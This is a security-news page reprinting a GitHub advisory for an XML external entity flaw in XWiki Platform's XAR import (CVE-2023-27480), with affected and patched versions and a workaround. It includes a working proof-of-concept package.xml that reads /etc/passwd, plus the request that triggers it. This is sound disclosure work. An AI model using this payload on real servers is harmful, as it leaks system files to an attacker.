Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-gx4f-976g-7g6v: XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference

Impact

Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.

Example to reproduce:

  • Create a forget XAR file and inside it, have the following package.xml content:
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    
    <package>
    <infos>
    <name>&xxe;</name>
    <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
    <licence></licence>
    <author>XWiki.Admin</author>
    ...
    
  • Upload it onto a wiki page (e.g. XXE) as an attachment (e.g. test.xar).
  • Call the page using http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar

You’ll then notice that the displayed UI contains the content of the /etc/passwd file.

Patches

The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.

Workarounds

You’d need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the XarPackage java class and then copy the modified version to your WEB-INF/classes directory (or rebuild the xwiki-platform-xar-model maven module and replace the one found in WEB-INF/lib/).

References

  • https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434
  • https://jira.xwiki.org/browse/XWIKI-20320

For more information

If you have any questions or comments about this advisory:

ghsa
#vulnerability#web#git#java#auth#jira#maven
  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2023-27480

XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference

High severity GitHub Reviewed Published Mar 7, 2023 in xwiki/xwiki-platform • Updated Mar 8, 2023

Package

maven org.xwiki.platform:xwiki-platform-xar-model (Maven)

Affected versions

>= 1.1-milestone-3, < 13.10.11

>= 14.0, < 14.4.7

>= 14.5, < 14.10-rc-1

Patched versions

13.10.11

14.4.7

14.10-rc-1

Impact

Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.

Example to reproduce:

  • Create a forget XAR file and inside it, have the following package.xml content:

    <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

    <package> <infos> <name>&xxe;</name> <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description> <licence></licence> <author>XWiki.Admin</author> …

  • Upload it onto a wiki page (e.g. XXE) as an attachment (e.g. test.xar).

  • Call the page using http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar

You’ll then notice that the displayed UI contains the content of the /etc/passwd file.

Patches

The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.

Workarounds

You’d need to get XWiki Platform sources and apply the changes from xwiki/xwiki-platform@e3527b9 to the XarPackage java class and then copy the modified version to your WEB-INF/classes directory (or rebuild the xwiki-platform-xar-model maven module and replace the one found in WEB-INF/lib/).

References

  • xwiki/xwiki-platform@e3527b9
  • https://jira.xwiki.org/browse/XWIKI-20320

For more information

If you have any questions or comments about this advisory:

  • Open an issue in Jira XWiki.org
  • Email us at Security Mailing List

References

  • GHSA-gx4f-976g-7g6v
  • https://nvd.nist.gov/vuln/detail/CVE-2023-27480
  • xwiki/xwiki-platform@e3527b9
  • https://jira.xwiki.org/browse/XWIKI-20320

Published by the National Vulnerability Database

Mar 7, 2023

Published to the GitHub Advisory Database

Mar 8, 2023

Related news

CVE-2023-27480: XWIKI-20320: Disallow DOCTYPE in the XAR descriptor · xwiki/xwiki-platform@e3527b9

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit rights on a document can trigger an XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host. This vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1. Users are advised to upgrade. Users unable to upgrade may apply the patch `e3527b98fd` manually.